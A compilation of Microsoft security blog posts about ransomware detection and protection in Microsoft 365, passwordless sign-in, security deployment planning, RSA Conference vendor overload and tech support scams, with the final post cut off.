As I thought more deeply about the question of why we cant stop all attacks, I was reminded of Nassim Nicholas Talebs seminal book The Black Swan: The Impact of the Highly Improbable. Taleb dives into how some negative events, no matter how improbable they are, can cause massive consequences. This is within cybersecurity also as demonstrated by for example WannaCry. The attack cost organizations across the globe billions of dollars and made headlines for weeks! Yet far fewer people have heard of Bad Rabbit, largely because it was identified and stopped by Windows Defender Anti Virus in 14 minutes before it caused widespread damage. Catching new malware isnt easy, but using layered machine learning from device to cloud and sharing that learning across systems rapidly is helping to find and catch new malware more quickly. With Bad Rabbit, after the first device encounter, the cloud protection service used detonation-based malware classification to block the file and protect subsequent users who downloaded the dangerous file.

Another example of rapid intelligent response spoiling a massive attack comes from March of this year. The malware, named Dofoil was a cryptocurrency miner that exhibited advanced cross-process injection techniques, persistence mechanisms, and evasion methods. Windows Defender AV picked up on behavior-based signals to identify the infection attempts and block more than 80,000 instances of the attack within milliseconds.

What is often overlooked or unseen in all the headlines, is that most of our cyber defenses are deeply effective, especially when you consider the sheer number of attacks enterprises face every day. Its easy to lose sight of this when a devastating attack occurs and controls the news narrative. Microsoft threat data shared from partners, researchers, and law enforcement worldwide gives a clearer picture of the massive scale of data were regularly protecting. In a month, using the Intelligent Security Graph, were analyzing 400 billion emails, scanning 1.2 billion devices and 18 billion Bing web pages while detecting 5 billion threats. Again, Im not suggesting we catch everything malicious as billions of pieces of data and hardware are scanned. We dont. Some malware inevitably gets through our protective layers. But when you consider the scale of attacks, and the prominence of digital products and tools in enterprises, its important to remember that we as an industry of cybersecurity professionals very often get it right. Users all over the world are accustomed to switching on their devices and safely opening hundreds of emails a day, seeing the correct balance in their mobile banking app, and trusting their GPS to accurately guide them from point A to point B. Our digital lives are deeply intertwined with our personal and work lives, and more often than not, they coexist in harmony.

In sum, its true; the cybersecurity industry cannot claim the ability to stop all cyberattacks. But lets not overlook all of the attacks that are detected and prevented every day. The hardworking cybersecurity professionals, the same ones I shared the stage with at The Homeland Security Training Institute at the College of DuPage, are advancing our capabilities to thwart cybercrimes every day. Yes, weve got work to do, this is an ongoing battle, but the wins and ongoing work deserve to be recognized too.

Categories: Uncategorized Tags:

Securing the modern workplace with Microsoft 365 threat protection – part 3

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

Detecting ransomware in the modern workplace

Over the last two weeks, we have shared with you the roots of Microsoft 365 threat protection and how Microsoft 365 threat protect helps protect the modern workplace from ransomware. This week, we discuss how Microsoft 365 threat protection helps detect ransomware in the modern workplace. Detection is critical for any best in class security solution especially when the person does not use Microsoft Edge with the benefits of its web protection. In our web-based scenario, the user can access the website through another browser, download the “software update” and infect their machine with ransomware. Microsoft 365 offers detection capabilities across all threat vectors and figure 1 summarizes the services which help to detect threats.

Ransomware Detection with Microsoft 365
Windows Defender Advanced Threat Protection
Azure Advanced Threat Protection
Microsoft Cloud App Security
Azure Security Center
Office 365 Advanced Threat Protection
Office 365 Threat Intelligence

Figure 1. Microsoft 365 threat protection helps detect threats to the modern workplace

For example, with ransomware downloads from the web, Windows Defender ATPs (WDATP) next-gen antivirus protection does an initial analysis of the file and sends all suspicious files to a detonation chamber. The file verdict is quickly determined. If a malicious verdict is returned, WDATP immediately begins blocking the threat. Todays most sophisticated ransomware is designed to spread laterally across networks increasing its potential impact. Fortunately, WDATP enables security operations specialists to isolate machines from the network, stopping threats from spreading. Also, WDATP provides granular visibility into the device ecosystem so that a compromised device can be easily identified. Built-in threat intelligence is leveraged to help detect the latest threats and provide real-time threat monitoring. As we alluded to, signal sharing via the intelligent security graph is a powerful differentiator of Microsoft 365, enabling threat detection across any threat vector. Once WDATP determines the downloaded files are malicious, it shares this signal with the Intelligent Security Graph enabling our other platforms to become aware of the threat.

The seamless integration, for example, allows admins to pivot directly from the device analysis in WDATP to user profiles in Azure ATP without losing context allowing a detailed investigation of the incident as shown in Figure 2 below.

Figure 2. Signal sharing and event timeline shared between WDATP and Azure ATP

Often, ransomware uses a brute force password method to move laterally through a network which our Azure ATP service is specifically designed to detect. A brute force password attack may attempt multiple logins until a correct password is used to enter an account. This anomalous behavior would be detected by Azure ATP and with signals shared from WDATP, the anomaly would be quickly assigned to the ransomware and blocked from being downloaded onto any part of the network (device, user, etc). Azure ATP enables security operations analysts to investigate the type of intrusions and methods used by attackers to gain privileged access to user identities and provides a clear attack and event timeline. While Azure ATP detects anomalies at the network level, Microsoft Cloud App Security can detect abnormal file and user behavior within native Microsoft cloud apps such as Office 365, as well as third-party cloud applications. To detect ransomware attacks, Microsoft Cloud App Security identifies behavioral patterns that reflect ransomware activity; for example, a high rate of file uploads or file deletion activities, coupled with threat intelligence capabilities, such as the detection of known ransomware extensions. Microsoft Cloud App Security will alert on these abnormalities using anomaly detection policies that provide out-of-the-box user and entity behavioral analytics (UEBA) and machine learning (ML) capabilities, as well as fully customizable activity policies, enabling SecOps to detect these anomalies instantly. Learn more about how Microsoft Cloud App Security and Azure ATP work in tandem to help detect an actual ransomware attack.

Azure Security Center is also connected with WDATP and provides infrastructure level alerts and even provides an investigation path so admins can fully view the threat propagation details. The service includes threat intelligence which maps the threat source and provides the potential objectives of the threat campaign. What happens if an attacker senses that the web-based attack vector is being blocked and pivots to sending the ransomware via email as an attachment download? Microsoft 365 integration is again crucial as WDATP also shares the signal with Office 365 and once our ransomware is identified by WDATP, Office 365 will begin blocking the threat too. With Office 365 ATPs real-time reporting and Office 365 threat intelligence, admins gain full visibility into all users who receive ransomware via email. Both Office ATP and Office threat intelligence services also track threats found in SharePoint Online, OneDrive for Business, and Teams so detection extends to the entire Office 365 suite. With Microsoft 365 threat protection, threats can be easily detected no matter how an attack is launched. Figure 3 shows the new Microsoft 365 Security and Compliance Center which is the hub from where admins can access the information from the different services.

Figure 3. Microsoft 365 Security and Compliance center which connects the Azure, Office 365, and Windows workloads

Next week we conclude our Microsoft 365 threat protection blog series by covering the remediation and education capabilities offered by Microsoft 365 threat protection. We will demonstrate how Microsoft 365 threat protection workloads can help quickly remediate a ransomware attack and also help educate end users on how to behave and react when under attack.

More blog posts from this series:

Categories: Uncategorized Tags:

Securing the modern workplace with Microsoft 365 threat protection – part 2

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

Protecting the modern workplace against Ransomware

Last week, we shared the roots of Microsoft 365 threat protection. This week, we want to share how Microsoft 365 threat protection services work together to help organizations protect themselves. Figure 1 is a graphical representation of the Microsoft advanced threat protection services which secure the attack surface.

Figure 1. Microsoft 365 advanced threat protection services work together to protect the modern workplace from attacks.

We continue with our ransomware scenario. Ransomware restricts data access by encrypting the user’s files or locking computers. Victims are required to pay a ransom to regain access to their machine and/or files. Microsoft closely monitors the threat landscape and our security intelligence provided in figure 2shows ransomware remains a prevalent and lethal threat type. All forms of ransomware can be launched at an organization through email, the device ecosystem, or through the enterprise infrastructure.

Figure 2. Monthly ransomware and ransomware downloader encounters, July 2016 to June 2017.

With so many different attack vectors a point service will be unable to mitigate the variety of potential ransomware attacks. Having services that protect specific parts of the attack surface that can also share signals to alert services protecting other surfaces of the enterprise is the only way to help ensure full and near real-time security. In many ransomware scenarios, users receive an email suggesting a necessary software update which can be done downloading an attachment. The attachment will contain a trojan downloader which can run a ransomware payload once opened. Figure 3 shows the Microsoft 365 threat protection services which can help protect the modern workplace from ransomware attacks.

Ransomware Protection with Microsoft 365
Windows Defender Advanced Threat Protection
Office 365 Advanced Threat Protection
Azure Security Center

Figure 3. Ransomware protection services for M365 threat protection.

All Microsoft 365 threat protection users have email protected with Office 365 ATP which helps stop unknown advanced threats sent via email. Office ATP will detonate all email attachments, determine if the file is malicious, and remove the file before final delivery of the email to a user mailbox. Additionally, Office ATP will assess links at the time of click when in both the body of an email and detonate links embedded in attachments to determine if they point to a malicious website. Since the attack surface is broad often attacks are made directly at devices. As such, several new enhancements helping prevent ransomware are built into the latest version of Windows 10, leveraging machine learning and behavior based technologies which lead the evolution of malware prevention. To directly attack the device, imagine if our attacker creates a website hosting exploit kits containing ransomware. Users visiting the site mistakenly download ransomware directly from the website. In such an event, Microsofts Edge leverages Windows Defender ATPs browser protection capability which determines if a site is malicious and can block access, helping secure the ransomware entry point. Ransomware attacks also target workloads running in the cloud. Azure Security Center helps provide visibility into your cloud infrastructure leveraging machine learning backed up by the Intelligent Security Graph to provide actionable alerts and recommendations on mitigating such threats as shown in figure 4. While none of these services alone can protect the entire modern workplace, together as Microsoft 365 threat protection, organizations can have confidence that Microsoft helps reduce threats from all vectors. Next week, well demonstrate how Microsoft 365 threat protection services help detect ransomware attacks.

Figure 4. The Azure Security Center Dashboard.

More blog posts from this series:

Categories: Uncategorized Tags:

Building a world without passwords

Nobody likes passwords. They are inconvenient, insecure, and expensive. In fact, we dislike them so much that weve been busy at work trying to create a world without them a world without passwords.

In this blog, we will provide a brief insight into how we at Microsoft have been thinking about solving this problem along with details on solutions that you can try out today.


When we think about creating a world without passwords, we want to deliver on two key promises:

  1. User promise: End-users should never have to deal with passwords in their day-to-day lives.
  2. Security promise: User credentials cannot be cracked, breached, or phished.

Passwords have been a big part of our digital lives, and to fully get rid of them, not only do we need to address all that is bad with them, we also need to acknowledge all that is good: they are familiar, portable, and easy to provision.


Figure 1. Passwords – Pros vs cons

At its core, our fundamental philosophy is simple: devalue the password, and replace it with something that eradicates its use for the end user and drains its value for an attacker.

Passwords have been a big part of our digital lives. To fully get rid of them, not only do we need to address all that is bad with them, we also need to acknowledge all that is good; they are familiar, portable, and can be used almost everywhere.

So how are we going about it? Well, we break this up into discrete buckets:

Figure 2: Password-less strategy

  1. Develop password-replacement offerings, i.e., replace passwords with a new set of alternatives that address the shortcomings of passwords while embracing their positive attributes.
  2. Reduce user visible password-surface area, i.e., upgrade all experiences related to the entire life-cycle of a users identity (including provisioning of an account, setting up a brand-new device, using the account/device to access apps and websites, recovery, etc.) and ensure these work with password-replacements (#1).
  3. Simulate a password-less world, i.e., enable end users and IT admins to simulate and transition into a password-less world with confidence.
  4. Eliminate passwords from the identity directory, i.e., the final frontier delete passwords from the identity directory.

For more details, watch Microsofts Guide for going password-less.

Heres a quick overview of some of the solutions that you can try out today and how they map to the strategy above.

Password-replacement offerings

Windows Hello

Heres a video that provides a quick overview of Windows Hello, how it is more secure than passwords, and some of newest enhancements.

Windows Hello is being used by over 47 million users worldwide. More than 5,000 businesses have deployed Windows Hello for Business, with adoption on over one million commercial devices.

For more details, refer to

Windows Hello is an excellent replacement for passwords on personal PCs. That said, we acknowledge that there are many scenarios that involve shared PCs used by transient users and that provisioning Windows Hello is not ideal. To that end, we have been working hard on lighting up a series of portable credentials that are more suitable for such shared PC scenarios.

Microsoft Authenticator app

The Microsoft Authenticator app enables users to authenticate to their Microsoft account using their mobile phone. It is built on similar secure technology that Windows Hello uses, and packages it into an simple app on your mobile device.

Heres a video that provides a quick overview of Microsoft Authenticator App.

To download the app and learn more, please go to Microsoft Authenticator

Windows Hello and our mobile Authenticator app are both great alternatives to passwords. To create a world without password, we need an interoperable solution that works across all industry platforms and browsers.

Windows Hello and FIDO2 security keys

Microsoft has been aligned with the Fast Identity Online (FIDO) working group from the start. The alliance represents 250 organizations from various industries on a joint mission to replace passwords with an easy-to-use strong credential. With the recent ratification of FIDO2 security keys by the FIDO working group, were updating Windows Hello to enable secure authentication for many new scenarios.

For more details, please check out our latest blog, Windows Hello and FIDO2 Security Keys enable secure and easy authentication for shared devices.

Whats new in the Windows 10 April 2018 Update?

Among many new and exciting features in the Windows 10 April 2018 Update, we set out with the goal to deliver an end-to-end product experience that’s password-less ready. With Windows 10 in S mode, we are enabling our cloud users (Managed Service Account or Azure Active Directory) to be able to go through the entire life-cycle of using their Windows 10 PC with S mode enabled without ever having to enter their passwords. Thats right. Heres how you can try it out.

Windows 10 in S mode Password-less!

  1. Set up your Authenticator App

    1. Install the Microsoft Authenticator app on your mobile device.
    2. Set it up with your Managed Service Account (MSA) and/or Azure Active Directory (Azure AD) account

Note: Upgrade your default way of authenticating from using password to the Microsoft Authenticator app by clicking the Use the Microsoft Authenticator app instead on the login page.

Figure 3: Select Microsoft Authenticator as default sign-in option

  1. Set up your Windows 10 PC with S mode enabled

    1. Install the Windows 10 April 2018 Update with S mode enabled
    2. Proceed through OOBE and set up your account
    3. Use the Microsoft Authenticator app to sign-in to your account. No passwords required!

Note: If you are prompted for a password on this screen, click the Use the Microsoft Authenticator app instead link.

Figure 4: Windows 10 S OOBE with Microsoft Authenticator app

  1. Set up Windows Hello

Figure 5: Windows Hello provisioning

  1. Thats it! Your Windows10 PC is password-less! Just use your device like you normally do.

    1. Access/SSO to your apps and websites will continue to work. No passwords required!

Figure 6: Access apps and websites seamlessly

    1. You will notice that youll be required to use Windows Hello (PIN, Face, Fingerprint) for sign-in/unlocking your PC. No passwords!

Figure 7: No passwords under Sign in options for Windows

    1. The password credential provider will no longer enumerate for Windows scenarios.

In summary, you will be able to set up a brand-new device, provision Windows Hello, log in, lock/unlock, use your favorite apps and websites without ever having to enter a password!

Security Keys for Windows Hello (Private preview for Azure AD-joined shared PCs)

FIDO2 Security keys allow you to carry your credential with you and safely authenticate to an Azure AD-joined Windows 10 shared PC thats part of your organization. A user can walk up to any device belonging to the organization and authenticate in a secure way no need to enter a username and password or set-up Windows Hello beforehand.

See how it works in this video:

The Windows Hello FIDO2 Security Key feature is now in limited preview. Please let us know if you would like to be added to the waitlist.

While we still have a way to go before we can claim victory, with the incredible lineup of products and features in our portfolio along with those in the works, we are confident that we will get there soon. Please send us your comments, questions, and feedback at


Karanbir Singh
Principal Program Manager, Enterprise & Security

First things first: Envisioning your security deployment

This blog post is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 Security solutions. In this series youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog Accelerate your security deployment with FastTrack for Microsoft 365.

Every successful project begins with a planning phase and planning a successful Microsoft 365 Security deployment is no different. Before digging into how you will roll out your new security infrastructure, start by asking what you want to achieve from both a business and technical standpoint. We will cover how to Onboard with FastTrack for Microsoft 365 in our next blog post.

Do all end users need anytime, anyplace access of data? Do they require access across all devices, or just selected devices? What data do you need to protect? Are different levels of security required for different users or groups? What about compliance considerations and company policies? Do you want your partners and customers to have secure access? This may not even be an option if government regulations restrict what controls you need to put in place.

FastTrack for Microsoft 365 can help work through these and other critical security planning considerations. FastTrack provides end to end guidance for planning, onboarding, and driving end user adoption for Microsoft 365 which is comprised of Enterprise Mobility + Security (EMS), Windows 10, and Office 365.

Based on thousands of customer experiences, we developed a three-step planning approach: Envision, Onboard, and Drive Value. The Envisioning phase can help you lay the groundwork for an effective security deployment plan.

Envisioning is a systematic way to match Microsoft 365 Security features with relevant company goals. It involves identifying and prioritizing relevant scenarios while learning about the tools and resources available as you plan for your rollout. In many ways, this stage is the most critical part of your journey, as youre setting the business goals youll measure your success against later.

Your Envisioning Checklist

The following checklist provides a few tips that our FastTrack for Microsoft 365 managers and engineers use to help you get your Envision step underway.

  • Know your goals and scenarios
    Decide what specific products and feature sets you want to enable and why by understanding what they will do for your company and your end users. Here are some examples:

    • Do you plan to secure your cloud resources and force users to provide additional verification to access them? For instance, are you thinking about

      • MFA (Multi-Factor Authentication).
      • Mobile Device Management
      • Azure Active Directory Domain Join
      • App access management

    • Are you considering empowering users to manage their own password resets?
    • Consider how you control admin access to cloud services (like O365), such as permanent rights granted to their account, or requiring MFA for admins.
    • What will be your device management strategy?

      • Which platforms (iOS, Android, Windows, etc.)?
      • Do you have corporate owned devices, will you allow BYOD (Bring Your Own Device), or both?

  • Leverage the resources to build your understanding
    Define the minimum requirements to deploy and determine if those requirements will work on your legacy architecture. You can find product videos, infographics, and demos at Microsoft Docs and FastTrack resources.
  • Map your key stakeholders and influencers
    Determine who will lead your organizations various teams and departments in this transformation, which employees will need special training based on how the new security tools affect their work, and who will own deployment and ongoing operations. FastTrack will use this information to identify the context of your deployment as it maps to your employees.

As youll discover, Envisioning can quickly add clarity and focus to an otherwise complex security roll-out. Ready to kick off a successful Envisioning process?

Start with a Success Plan

Our FastTrack Success Plan is an online tool that walks you through each step of your Envisioning experience. The Success Plan can be launched by either you or your Microsoft Partner and provides all the guidance and resources you need to plan a successful Microsoft 365 Security deployment. Once completed, the plan also provides you with a clear path to help you get the most out of your FastTrack services. To get started, simply sign in to FastTrack.

More blog posts from this series:

Categories: Uncategorized Tags:

Overwhelmed by overchoice at RSA Conference 2018

April 25th, 2018 No comments

As over 500 companies vied for mindshare at this years RSA conference – a cacophony of vendors pitching thousands of products from brightly colored booths – it reminded me of how challenging it was for me to separate signal from noise when I was managing global networks. And the rapid growth of vendors and solutions in the past few years makes me wonder how overwhelming the choice must seem for CISOs today.

This challenge extends well beyond the show floor of RSA. Security Operations Center (SOC) analysts parse through thousands to even millions of alerts per day working as quickly as possible to investigate them and determine which ones represent real threats. Enterprises need tools that can help them identify and contain threats quickly, but the SOC analyst dilemma of too many alerts is echoed on the show floor. There are just too many vendor and solution choices to pick from. This phenomenon known as overchoice leads to paralysis, obstructing our ability make confident choices and seek timely guidance. Psychologists have long studied this construct and found that along with paralysis, the presence of too many options can even push people into decisions that work against their best interests.

As more than 50,000 RSA attendees worked their way across the conference center floor, I watched as they encountered an endless array of ever-changing acronyms, software, and hardware to address problems they probably didnt even know they had. In the quest to create and name the next generation of most innovative solutions, new categories and acronyms abound from SIM to SEM to SOAR, and AV to EPP to EDR. Unfortunately, these new solutions can come so fast that the features may fuzz into buzzword bingo for attendees. With IoT and the intelligent edge, there are new security scenarios for enterprises to solve for. With that come new categories of security, and new offerings flood the market. Enterprise professionals are left fighting an uphill battle across a foggy landscape.

There is a way to address all this complexity. It starts with you and your enterprise. As the person who knows your enterprise best, you are positioned to drive the decision-making process based on real-world scenarios and everyday learnings.

Vendors often try to identify problems, solve them, and hope someone needs the solutions. But every enterprise is unique, and not all threats are prioritized evenly across the board. If CISOs can assess enterprise-wide learnings and lean on the vendors to interpret and understand real-world issues, a more coherent strategy and product should emerge.

Of course, its not always easy for enterprise CISOs to understand and prioritize their needs. If this is the case in your enterprise, third-party consultants can help assess your current security posture and forge an action plan for optimization. Once a plan is created, the buyer should drive the process and avoid unnecessary distractions that lead to evaluating dozens of options and trying to understand where the puzzle pieces fit together. CISOs can also lean on the vendor to help interpret and understand the enterprises defined needs once they understand their needs and have prioritized them.

To better facilitate this approach, first ask, “What is the business problem Im trying to solve? For example: Retail organizations may want to enhance their online store to include customer intelligence to provide a better customer experience. What type of privacy security will be required to do this? Will there be compliance requirements to do this? If general themes emerge rather than more nuanced security gaps, CISOs can use a known framework, like the NIST Cybersecurity Framework. Its a useful tool for managing cybersecurity outcomes, and it covers all the verticals of cybersecurity, making it easier to adopt and join with other frameworks you might also need to incorporate in your security program.

Once you have a solid grasp of the enterprise security requirements, start to look for solutions that specifically meet those needs. Once the business problems are identified and the researching of solutions takes place, youll bump into those pervasive acronyms again. Dont get sucked in – resist the urge to solve for every potential problem vendors are trying to solve for. Focus on the vendors whose solutions specifically address your enterprises problems and meet your requirements. Ask your peers for their own firsthand experience. Ask them which solutions have or haven’t worked for them. You can even ask vendors for references to speak with.

Once promising vendor solutions emerge, confirm that the solution will solve your enterprises problem. Get proof that it will – which doesnt necessarily equate to knowing every single mathematical detail about the algorithms used in a solutions ML engine or reviewing each line of code. But it does mean seeing the solution in action. Demo and test-drive it, preferably in your own environment. This approach is about the buyer driving the process, and staying engaged. Like most things related to our safety and security, the more engagement, the better the outcome.

These are active times in cybersecurity. The great news is a lot of innovative, smart, and motivated companies are working hard to build intelligent solutions to thwart cyberattacks. But were all at risk of paralysis from overchoice. Stay on target by focusing on your business problems and needs, and demand that vendors cut through the buzz to focus on proving they can deliver results. See what Microsoft presented and our latest security innovations at the RSA Conference.

Categories: RSA Conference Tags:

Securing the modern workplace with Microsoft 365 threat protection – part 1

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

The roots of Microsoft 365 threat protection

Over the next few weeks, well introduce you to Microsoft 365s threat protection services and demonstrate how Microsoft 365s threat protection leverages strength of signal, integration, machine learning and AI to help secure the modern workplace from a ransomware attack. Previously, we showcased how Office 365 helps mitigate modern phishing attacks. Microsoft 365 threat protection goes even further, providing robust protection, detection, and response capabilities across an organizations entire attack surface. For those not aware, Microsoft 365 was introduced at last years Microsoft Inspire conference, to provide an intelligent, integrated, and secure solution for the modern workplace, combining the benefits of Microsofts flagship Windows, Office 365, and Enterprise Mobility Suite (EMS) platforms. Figure 1 shows the services which are part of Microsoft 365 threat protection and jointly help secure the modern workplace so organizations can initiate and drive their digital transformation.

Figure 1. The Microsoft 365 threat protection security services

Microsoft is committed to a security first mindset

Microsoft has always been securing products and platforms to protect our customers who rely on our software and cloud services. Our security focus is essential to meet the 24/7 business cycle demands and helps ensure our customers rarely experience downtime from a security event. Microsoft invests $1B+ annually on security, employs 3500+ security professionals, and has built several strong ecosystem partnerships. As the modern workplace grows in complexity, Microsoft continues building and enhancing its security capabilities to help our customers stay ahead of modern threats. Microsoft itself is one of the worlds largest enterprises and uses the same security products to protect our organization that we offer our customers.

The Microsoft Intelligent Security Graph

For our teams at Microsoft (both in operations and development), security really begins with the Microsoft Intelligent Security Graph. It is the platform that powers Microsoft security products and services by using advanced analytics to link threat intelligence and security signals from Microsoft and partners to identify and mitigate cyberthreats. Intelligence in the Intelligent Security Graph comes from consumer and commercial services that Microsoft operates on a global scale, such as Windows, Office 365, and Azure as shown in figure 2. At Microsoft, we have massive depth and breadth of intelligence. Across our global services, each month we scan 400 billion email messages for phishing and malware, process 450 billion authentications, execute more than 18 billion web page scans, and scan more than 1.2 billion devices for threats, nearly 2.6 billion monthly unique file scans, and more than 200 cloud services. Importantly, this data always goes through strict privacy and compliance boundaries before being used for security.

Figure 2. Microsofts Global Threat Intelligence is one of the largest in industry

Signal from the graph is analyzed using a combination of Microsofts industry leading artificial intelligence and machine learning capabilities coupled with the expertise of security researchers, analysts, hunters, and engineers across the company to quickly identify attacks and emerging trends so that we can evolve the immediate detections and capabilities of Microsoft 365. All our security capabilities leverage the graph, including the threat protection services comprised of Windows Defender Advanced Threat Protection (WDATP), Office 365 Advanced Threat protection (ATP), Office 365 Threat Intelligence, Microsoft Cloud App Security, Azure Security Center, and the newly launched Azure Advanced Threat Protection (Azure ATP).

These threat protection services also share threat signal with each other through the graph and this signal sharing enables each service to leverage threat data from not only the threats blocked by that service but also threat in the entire threat landscape. While this post uses the example of a sophisticated ransomware attack, customers who leverage the entire Microsoft 365 threat protection stack will have near real-time protection from many types of new and unknown threats (e.g. 0-days, advanced phishing, advanced malware, etc) for their device ecosystem, Office 365 ecosystem, and cloud, on-premises, or hybrid infrastructures by leveraging the Intelligent Security Graph.

Microsoft 365 threat protection

The modern workplace is exposed to the rapid evolution of cyber threats, from individual threats, to sophisticated organizational breaches, to rapid cyberattacks. With the growing complexity of the modern workplace, the attack surface has rapidly expanded, to a point where no single service can adequately protect an organization. To address this, we focused on developing different services that specialize on the main threat vectors and then integrating them together via the Intelligent Security Graph. The modern workplace is composed of employee identities, enterprise applications and data, devices, and infrastructure. Microsoft 365 threat protection helps mitigate advanced threats from each of these potential threat vectors providing an end to end, holistic solution securing an organizations entire attack surface enabling:

  • Protection against advanced threats such as 0-days, targeted phishing, ransomware, and others
  • Detection when a breach has occurred, who has been breached, what data has been compromised
  • Response remediate from an attack and return the organization to a no threat state
  • Education end users on how to react or respond to different types of threats

While most security solutions do not include an educational component, we have seen that many of our customers now help educate their end users on how to react and behave in the event of a cyberattack. To help address this important aspect of security, we now offer tools that can help educate end users. While the majority of attacks are still initiated via email, 2017s most destructive attacks, NotPetya and WannaCry, were not email based. One of the benefits of Microsoft 365 threat protection is seamless integration that enables rapid transfer of information across platforms and services to help ensure all attack surfaces are quickly secured no matter where a threat originates. Over the next few weeks, we will cover Microsoft 365 and how to enable (1) Protection (2) Detection (3) Response and Education. Next week, well demonstrate how Microsoft 365 threat protection helps organizations protect an enterprise from a ransomware attack.

Categories: Uncategorized Tags:

Teaming up in the war on tech support scams

(Editors note: Erik Wahlstrom spoke about the far-reaching impact of tech support scams and the need for industry-wide cooperation in his RSA Conference 2018 talk Tech Scams: Its Time to Release the Hounds.)


Social engineering attacks like tech support scams are so common because theyre so effective. Cybercriminals want to bilk users money. They can spend a great deal of time and energy attacking the security of a devicebrute-force passwords, develop custom and sophisticated malware, and hunt down vulnerabilities to exploit. Or they can save themselves the trouble and convince users to freely give up access to their devices and sensitive information.

Microsoft has built the most secure version of its platform in Windows 10. Core OS technologies like virtualization-based security, kernel-based mitigations, and the Windows Defender ATP stack of security defenses make it much more difficult for exploits, malware, and other threats to infect devices. Every day, machine learning and artificial intelligence in Windows Defender ATP protect millions of devices from malware outbreaks and cyberattacks. In many cases, customers may not even know they were protected. Windows 10 S, a special configuration of Windows 10, takes this even further by only running apps from the Microsoft Store, effectively preventing the vast majority of attacks.

Protect yourself from tech support scams

  • Note that Microsoft does not send unsolicited email messages or make unsolicited phone calls to request for personal or financial information, or fix your computer.
  • Remember, Microsoft will never proactively reach out to you to provide unsolicited PC or technical support. Any communication we have with you must be initiated by you.
  • Dont call the number in pop-ups. Microsofts error and warning messages never include a phone number.

The Windows 10 security stack greatly increases the cost for attackers. Many cybercriminals instead choose to target the humans in front of the PCs. It can sometimes be easier to convince users to willingly share their passwords, account info, or to install hazardous apps onto their device than to develop malware and steal info unnoticed.

Scammers continue to capitalize on the proven effectiveness of social engineering to perpetrate tech support scams. These scams are designed to trick users into believing their devices are compromised or broken. They do this to scare or coerce victims into purchasing unnecessary support services.

To help protect customers from scammers, we continue to enhance antivirus, email, URL blocking, and browser security solutions. However, given the scale and complexity of tech support scams, how can the security industry at large work together to deal a major blow to this enduring threat?

Still a growing global problem

In 2017, Microsoft Customer Support Services received 153,000 reports from customers who encountered or fell victim to tech support scams, a 24% growth from the previous year. These reports came from 183 countries, indicating a global problem.

Approximately 15% of these customers lost money in the scam, costing them on average between $200 and $400. In some cases, victims pay a lot more. In December 2017, Microsoft received a report of a scammer emptying a bank account of 89,000 during a tech support scam in the Netherlands.

Tech support scams reported to Microsoft

In a 2016 survey sponsored by Microsoft, two in three respondents reported experiencing some form of tech support scam in the previous 12 months, with nearly one in ten losing money.

However, as with many social engineering attacks, its tricky to put an absolute number to the problem. The figures above represent reports to Microsoft. The problem is so much bigger, given that tech support scams target customers of various other devices, platforms, or software.

An organized cybercriminal enterprise

Tech support scams come in several forms, but they share a common attack plan:

Scammers initiate these social engineering attacks in many ways, including:

  • Scam websites that use various tactics including browser dialog traps, fake antivirus detecting fake threats, and fake full-screen error messages. Scammers lead potential victims to these websites through ads, search results, typosquatting and other fraudulent mechanisms.
  • Email campaigns that use phishing-like techniques to trick recipients into clicking URLs or opening malicious attachments
  • Malware thats installed on computers to make system changes and display fake error messages
  • Unsolicited phone calls (also known as cold calls), which are telemarketing calls from scammers that pretend to be from a vendors support team

The complete attack chain shows that these attacks lead to the same goal of getting customers in contact with a call center. Once connected, a fake technician (an experienced scammer) convinces the victim of a problem with their device. They often scare victims with urgent problems requiring immediate action. They instruct victims to install remote administration tools (RATs), which provide the scammers access to and control over the device.

tech support scams attack chain

From this point on, scammers can make changes to the device or point out common non-critical errors, and present these as problems. For example, scammers are known to use Event Viewer to show errors or netstat to show connections to foreign IP addresses. The scammers then attempt to make the sale. With control of the device, scammers can make a compelling case about errors in the device and pressure the victim to pay.

An industry-wide problem requires industry-wide action

The tech support scam problem is far-reaching. Its impact spans various platforms, devices, software, services. Examples include:

  • Tech support scams targeting specific platforms like Windows, macOS, iOS, and Android
  • Tech support scam websites that imply a formal relationship or some sort of approval by well-known vendors
  • Fake malware detection from programs or websites that mimic various antivirus solutions
  • Customized tech support scams that tailor messages and techniques based on geography, OS, browser, or ISP

As in many forms of social engineering attacks, customer education is key. There are tell-tale signs: normal error and warning messages should not have phone numbers, most vendors dont make unsolicited phone calls to fix a device, etc. To help protect and educate Microsoft customers, we have published blogs, websites, videos, and social media campaigns on the latest tech support scam trends and tactics. We have also empowered customers to report tech support scams.

Beyond customer education, the scale and complexity of tech support scams require cooperation and broad partnerships across the industry. The Microsoft Digital Crimes Unit (DCU) works with law enforcement and other agencies to crack down on scammers.

We have further built partnerships across the ecosystem to make a significant dent on this issue:

  • Web hosting providers, which can take down verified tech support scam websites
  • Telecom networks, which can block tech support scam phone numbers
  • Browser developers, who can continuously thwart tech support scam tactics and block tech support scam websites
  • Antivirus solutions, which can detect tech support scam malware
  • Financial networks, who can help protects customers from fraudulent transactions
  • Law enforcement agencies, who can go after the crooks

We seek to continue expanding and enriching these partnerships. While we continue to help protect customers through a hardened platform and increasingly better security solutions, we believe its high time for the industry to come together and put an end to the tech support scam problem. Together, we can make our customers lives easier and safer.



Erik Wahlstrom
Windows Defender Research Project Manager



Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Introducing Windows Defender System Guard runtime attestation

At Microsoft, we want users to be in control of their devices, including knowing the security health of these devices. If important security features should fail, users should be aware. Windows Defender System Guard runtime attestation, a new Windows platform security technology, fills this need.

In Windows 10 Fall Creators Update, we reorganized all system integrity features into Windows Defender System Guard. This move allowed us to continually make significant innovations in platform security. Windows Defender System Guard runtime attestation, which is built into the core Windows operating system, will soon be delivered in all editions of Windows. Windows Defender System Guard runtime attestation, like Credential Guard, takes advantage of the same hardware-rooted security technologies in virtualization-based security (VBS) to mitigate attacks in software.

